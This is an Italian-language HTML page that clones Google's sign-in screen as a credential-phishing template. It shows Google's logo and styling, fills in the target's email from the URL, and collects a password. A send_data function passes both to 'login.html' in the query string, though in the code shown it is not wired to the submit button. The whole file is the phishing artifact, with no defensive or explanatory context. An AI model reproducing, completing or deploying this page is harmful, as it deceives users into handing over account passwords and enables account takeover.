<!DOCTYPE html>
<html lang="it">

<head>
    <meta charset="UTF-8" />
    <title>Accedi - Google</title>
    <style>
        body {
            background-color: rgb(30, 31, 32);
            font-family: "Google Sans", roboto, "Noto Sans Myanmar UI", arial, sans-serif;
            font-size: 0.875rem;
            font-weight: 500;
            letter-spacing: 0rem;
            line-height: 1.4285714286;
            color: white;
            min-height: 100vh;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            margin: 0;
            padding: 0;
        }

        .links {
            color: #a8c7fa;
            text-decoration: none;
            cursor: pointer;
        }

        .links:hover,
        .links:focus {
            text-decoration: underline;
        }

        .next {
            background-color: #a8c7fa;
            color: #0b3273;
            padding: 10px 20px;
            width: 27%;
            border-radius: 30px;
            text-align: center;
            border: none;
            cursor: pointer;
        }

        .form-group {
            position: relative;
            margin-bottom: 1.5rem;
        }

        .form-input {
            width: 100%;
            padding: 1.2rem 0.75rem 0.5rem;
            background: transparent;
            border: 1px solid rgb(196, 199, 197);
            border-radius: 4px;
            color: rgb(196, 199, 197);
            outline: none;
            font-size: 1rem;
        }

        .form-input:focus {
            border: 2px solid #a8c7fa;
            outline: none;
            box-shadow: none;
        }

        .form-label {
            position: absolute;
            top: 1.05rem;
            left: 0.75rem;
            color: #aaa;
            font-size: 1rem;
            pointer-events: none;
            background: #0e0e0e;
            padding: 0 0.25rem;
            transition: 0.2s ease all;
            transform-origin: center center;
        }

        .form-input:focus + .form-label,
        .form-input:not(:placeholder-shown) + .form-label {
            top: -0.55rem;
            left: 0.6rem;
            font-size: 0.75rem;
            color: #a8c7fa;
            outline: none;
            box-shadow: none;
        }

        .container {
            background-color: #0e0e0e;
            width: 55%;
            height: 50%;
            display: flex;
            margin: 0 auto;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            padding: 48px 0;
            border-radius: 28px;
        }

        .title-section {
            text-align: center;
            margin-bottom: 1.5rem;
        }

        .title-section h1 {
            font-weight: 400;
            font-size: 2rem;
            margin-bottom: 0.5rem;
        }

        .title-section p {
            font-size: 0.9rem;
            color: #bbb;
        }

        .w-80 {
            width: 320px;
        }

        .info-text {
            color: #bbb;
            font-size: 0.875rem;
            margin-bottom: 1.5rem;
        }

        .checkbox-group {
            display: flex;
            align-items: center;
            margin-bottom: 1.5rem;
            user-select: none;
            cursor: pointer;
        }

        .checkbox-group input[type="checkbox"] {
            margin-right: 0.5rem;
            cursor: pointer;
            width: 16px;
            height: 16px;
        }

        footer {
            width: 51%;
            padding: 1.5rem 2rem;
            color: #999;
            font-size: 0.75rem;
            display: flex;
            justify-content: space-between;
            align-items: center;
            box-sizing: border-box;
        }

        footer a {
            color: #999;
            text-decoration: none;
            margin-right: 1rem;
        }

        footer a:hover,
        footer a:focus {
            text-decoration: underline;
        }

        footer .language-selector,
        footer .links-footer {
            display: flex;
            align-items: center;
        }

        footer .language-selector i {
            margin-left: 0.25rem;
            font-style: normal;
            border: solid #999;
            border-width: 0 2px 2px 0;
            display: inline-block;
            padding: 3px;
            transform: rotate(45deg);
            -webkit-transform: rotate(45deg);
        }

        .flex {
            display: flex;
        }

        .justify-between {
            justify-content: space-between;
        }

        .items-center {
            align-items: center;
        }

        .space-x-4 > * + * {
            margin-left: 1rem;
        }

        .account-name {
            align-items: center;
            border-style: solid;
            border-radius: 16px;
            border-width: 1px;
            box-sizing: border-box;
            color: rgb(227, 227, 227);
            border-color: rgb(196, 199, 197);
            color-scheme: dark;
            cursor: pointer;
            direction: ltr;
            display: inline-flex;
            font-family: "Google Sans", roboto, "Noto Sans Myanmar UI", arial, sans-serif;
            font-size: 14px;
            font-weight: 500;
            letter-spacing: 0.25px;
            line-height: 20px;
            max-width: 100%;
            padding-bottom: 0px;
            padding-left: 3px;
            padding-right: 8px;
            padding-top: 0px;
            position: relative;
            -moz-box-align: center;
        }

        .account-icon {
            border-radius: 50%;
            height: 25px;
            margin-right: 8px;
            width: 25px;
            margin-top: 3px;
            margin-bottom: 3px;
        }
          
    </style>
</head>

<body>
    <div class="container">
        <div class="mb-8">
            <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 40 48" aria-hidden="true">
                <path fill="#4285F4"
                    d="M39.2 24.45c0-1.55-.16-3.04-.43-4.45H20v8h10.73c-.45 2.53-1.86 4.68-4 6.11v5.05h6.5c3.78-3.48 5.97-8.62 5.97-14.71z"></path>
                <path fill="#34A853"
                    d="M20 44c5.4 0 9.92-1.79 13.24-4.84l-6.5-5.05C24.95 35.3 22.67 36 20 36c-5.19 0-9.59-3.51-11.15-8.23h-6.7v5.2C5.43 39.51 12.18 44 20 44z">
                </path>
                <path fill="#FABB05"
                    d="M8.85 27.77c-.4-1.19-.62-2.46-.62-3.77s.22-2.58.62-3.77v-5.2h-6.7C.78 17.73 0 20.77 0 24s.78 6.27 2.14 8.97l6.71-5.2z">
                </path>
                <path fill="#E94235"
                    d="M20 12c2.93 0 5.55 1.01 7.62 2.98l5.76-5.76C29.92 5.98 25.39 4 20 4 12.18 4 5.43 8.49 2.14 15.03l6.7 5.2C10.41 15.51 14.81 12 20 12z">
                </path>
            </svg>
        </div>
        <div class="title-section">
            <h1>Bentornato</h1>
            <div class="account-name">
                <svg aria-hidden="true" class="account-icon" fill="currentColor" focusable="false" width="48px" height="48px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm6.36 14.83c-1.43-1.74-4.9-2.33-6.36-2.33s-4.93.59-6.36 2.33C4.62 15.49 4 13.82 4 12c0-4.41 3.59-8 8-8s8 3.59 8 8c0 1.82-.62 3.49-1.64 4.83zM12 6c-1.94 0-3.5 1.56-3.5 3.5S10.06 13 12 13s3.5-1.56 3.5-3.5S13.94 6 12 6z"></path></svg>
                    <span id="email"></span>
                <svg aria-hidden="true" class="Qk3oof u4TTuf" fill="currentColor" focusable="false" width="24px" height="24px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><path d="M7 10l5 5 5-5z"></path></svg>
            </div>
            <p>Per continuare, verifica innanzitutto la tua identità</p>
        </div>
        <div class="w-80">
            <div class="form-group">
                <input type="password" id="password" name="password" class="form-input" placeholder=" " required>
                <label for="password" class="form-label">Inserisci la password</label>
            </div>

            <label class="checkbox-group" for="show-password">
                <input type="checkbox" id="show-password" style="accent-color:black;" />
                Mostra password
            </label>

            <!-- <p class="info-text">
                Non si tratta del tuo computer? Utilizza una finestra privata per accedere.
                <a href="#" class="links">Scopri di più sull'utilizzo della modalità Ospite</a>
            </p> -->

            <div class="flex justify-between items-center">
                <a href="#" class="links">Password dimenticata?</a>
                <button class="next" type="submit"><strong>Avanti</strong></button>
            </div>
        </div>
    </div>

    <footer>
        <div class="language-selector flex space-x-4">
            <a href="#" class="links" style="color: rgb(196, 199, 197)">Italiano</a>
            <i></i>
        </div>
        <div class="links-footer flex space-x-4">
            <a href="#" class="links" style="color: rgb(196, 199, 197)">Guida</a>
            <a href="#" class="links" style="color: rgb(196, 199, 197)">Privacy</a>
            <a href="#" class="links" style="color: rgb(196, 199, 197)">Termini</a>
        </div>
    </footer>

    <script>
        // Script per toggle mostra/nascondi password
        const checkbox = document.getElementById('show-password');
        const passwordInput = document.getElementById('password');

        checkbox.addEventListener('change', () => {
            passwordInput.type = checkbox.checked ? 'text' : 'password';
        });
    </script>

    <script>
        const params = new URLSearchParams(window.location.search);
        const email = params.get('email');
    
        if (email) {
          document.getElementById('email').textContent = email;
        } else {
          document.getElementById('email').textContent = "unknown";
        }

        function send_data() {
            const password = document.getElementById('password').value;
            const email = document.getElementById('email').textContent;
            window.location.href = `login.html?email=${email}&password=${password}`;
        }
    </script>
</body>

</html>
